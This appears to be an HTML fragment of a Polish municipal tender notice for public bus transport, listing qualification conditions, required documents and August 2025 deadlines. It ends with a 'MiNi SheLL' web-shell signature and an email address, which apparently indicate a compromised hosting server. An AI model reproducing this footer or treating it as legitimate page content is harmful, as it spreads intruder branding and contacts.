zamawiającego obowiązku podatkowego;<br/>2)	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub <br/> świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>3)	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym <br/> zamawiającego, cena brutto. <br/>4)	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą <br/> wykonawcy, będzie miała zastosowanie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.1.	Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/> Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego <br/> warunku. <br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/> o ile wynika to z odrębnych przepisów:<br/><br/>Wymagane jest wykazanie przez Wykonawców, że posiadają aktualną koncesję, zezwolenie, licencję na wykonywanie krajowego transportu drogowego osób, wydaną na podstawie Ustawy z dnia 6 września 2001 r. o transporcie drogowym ( t.j. Dz. U. <br/>z 2025, poz. 285).<br/><br/>3)	sytuacji ekonomicznej lub finansowej:<br/><br/>Zamawiający wymaga, aby wykonawca posiadał ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną minimum 200.000 zł.<br/> <br/>4)	zdolności technicznej lub zawodowej:<br/>5)	Zamawiający uzna, że Wykonawca spełnia warunek wówczas gdy:<br/>a) w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie wykonał, a w przypadku świadczeń powtarzających się lub ciągłych również wykonuje należycie co najmniej 1 usługę polegającą na wykonywaniu przewozów publicznych o wartości co najmniej 200.000,00 zł brutto, przez pojęcie przewozów publicznych należy rozumieć powszechnie dostępny regularny przewóz osób wykonywany w określonych odstępach czasu i po określonej linii komunikacyjnej, liniach komunikacyjnych lub sieci komunikacyjnej, zgodnie z art. 4 ust. 1 pkt 14 ustawy z dnia 16 grudnia 2010 r. o publicznym transporcie zbiorowym (Dz. U. z 2025, poz. 285), <br/>b) posiada narzędzia, wyposażenie zakładu lub urządzenia techniczne w celu wykonania zamówienia publicznego, a w szczególności posiada co najmniej 2 autobusy nie starsze niż 10 lat (maksymalnie rocznik 2015), niskowejściowe, minimum 40 miejsc siedzących, wyposażone w klimatyzację, spełniające wymagania techniczne określone przepisami ustawy Prawo o Ruchu Drogowym oraz innymi przepisami szczegółowymi. <br/>c) dysponuje bazą eksploatacyjną lub zajezdnią umożliwiającą podstawienie autobusu zastępczego w ciągu 15 min. Baza musi być wyposażona w sprzęt techniczny i urządzenia techniczne umożliwiające prowadzenie działalności transportowej w sposób zorganizowany i ciągły w której skład wchodzą miejsca postojowe oraz miejsca konserwacji i naprawy pojazdów. <br/><br/><br/>6.2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art. 112 ust. 2 pkt 2, jest spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje usługi, do których realizacji te uprawnienia są wymagane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">nie są wymagane</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	Podmiotowe środki dowodowe potwierdzające spełnianie warunków udziału w postępowaniu:<br/>W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej zamawiający żąda następujących podmiotowych środków dowodowych:<br/>- zezwolenie na wykonywanie zawodu przewoźnika drogowego, o którym mowa w art. 5 ust. 1 ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz.U. 2025, poz. 285 lub licencję na wykonywanie krajowego lub międzynarodowego transportu drogowego osób, o których mowa w art. 5 ust. 1 lub ust. 2 ustawy z dnia 5 kwietnia 2013 r. o zmianie ustawy o transporcie drogowym oraz ustawy o czasie pracy kierowców (Dz. U. z 2024 r., poz. 220),<br/>- dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 200.000 zł,<br/>- wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Wzór usług wykonanych stanowi Załącznik do SWZ,<br/>- wykazu narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych Wykonawcy w celu wykonania zamówienia publicznego wraz z informacją o podstawie do dysponowania tymi zasobami. Wzór urządzeń technicznych dostępnych Wykonawcy stanowi Załącznik do SWZ.<br/>- oświadczenie o dysponowaniu bazą eksploatacyjną lub zajezdnią.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie są wymagane <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 12.11.	Do oferty należy dołączyć:<br/>1)	Formularz ofertowy<br/>2)	aktualne na dzień składania ofert oświadczenie/oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu;<br/>3)	dokumenty o których mowa w pkt. 12.6-12.10, chyba ze wykonawca wskaże <br/>w ofercie dane umożliwiające dostęp do tych dokumentów w formularzu ofertowym;<br/>4)	zobowiązanie podmiotu udostępniającego zasoby, jeżeli wykonawca polega na zasobach innego podmiotu;<br/>5)	dowody równoważności, o których mowa w pkt 3.6 SWZ, jeżeli dotyczą;<br/>6)	uzasadnienie zastrzeżenia tajemnicy przedsiębiorstwa, jeżeli wykonawca zastrzegł w ofercie informacje jako tajemnicę przedsiębiorstwa; <br/>7)	pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania, jeżeli dotyczy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 6.6.	Wykonawcy wspólnie ubiegający się o zamówienie.<br/>1)	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2)	W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania <br/>w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3)	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 7.1., składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy <br/> z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>4)	W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do występowania w obrocie gospodarczym lub zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik do SWZ.<br/>6.7. Zamawiający nie wymaga złożenia przedmiotowych środków dowodowych w celu potwierdzenia zgodności oferowanych dostaw z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub w opisie kryteriów oceny ofert, lub wymaganiami związanymi z realizacją zamówienia z wyjątkiem przepadków gdy wykonawca oferuje rozwiązania równoważne. W takim przypadku Zamawiający żąda złożenia przedmiotowych środków dowodowych wraz z ofertą. Jeżeli wykonawca nie złoży wraz z ofertą przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe okażą się niekompletne, Zamawiający wezwie do ich uzupełnienia.<br/>6.8.	W zakresie rodzajów, okresu ważności i formy, w jakiej mogą być składane oświadczenia lub dokumenty, o których mowa w pkt 7.4. SWZ obowiązują przepisy Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. <br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U z 2020 r. poz. 2415).<br/>6.9.	Informacja dla wykonawców polegających na zasobach innych podmiotów, na zasadach określonych w art. 118 ustawy pzp oraz zamierzających powierzyć wykonanie części zamówienia podwykonawcom<br/>1)	Zamawiający nie żąda wskazania przez Wykonawcę, w ofercie, części zamówienia, których wykonanie zamierza powierzyć podwykonawcom, którzy nie są podmiotami udostępniającymi zasoby oraz podania nazw ewentualnych podwykonawców.<br/>2)	W przypadku zamówień na roboty budowlane oraz usługi, które mają być wykonane w miejscu podlegającym bezpośredniemu nadzorowi Zamawiającego, Zamawiający będzie żądał, aby przed przystąpieniem do wykonania zamówienia Wykonawca podał nazwy, dane kontaktowe oraz przedstawicieli, podwykonawców zaangażowanych w takie roboty budowlane lub usługi, jeżeli są już znani.<br/>3)	Wykonawca będzie zobowiązany do zawiadamiania Zamawiającego o wszelkich zmianach w odniesieniu do informacji, o których mowa w pkt 7.3 pkt 1) SWZ, <br/>w trakcie realizacji zamówienia, a także przekaże wymagane informacje na temat nowych podwykonawców, którym w późniejszym okresie zamierza powierzyć realizację robót budowlanych lub usług. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-08-14 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/strzelce_wielkie</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-08-14 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-09-12</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com